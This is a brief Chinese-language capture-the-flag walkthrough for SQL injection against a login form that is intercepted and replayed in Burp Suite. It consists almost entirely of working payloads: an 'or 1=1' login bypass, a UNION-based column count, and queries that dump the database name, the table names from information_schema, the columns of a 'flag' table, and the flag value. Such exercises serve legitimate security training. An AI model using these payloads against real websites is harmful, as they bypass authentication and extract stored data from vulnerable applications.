BP抓包重放
万能密码登入:username=admin’ or 1=1 #password=123
判断几个字段:username=admin’ or 1=1 union select 1,2,3 #password=123
爆库,爆表,爆字段,爆值
爆库
username=admin’ or 1=1 union select 1,database(),3 #$password=123
=====XXX
爆表
username=admin’ or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“XXX”#&password=123
=====flag
爆字段
username=admin’ or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“flag”#&password=123
爆值
username=admin’ or 1=1 union select 1,flag,3 from flag#&password=123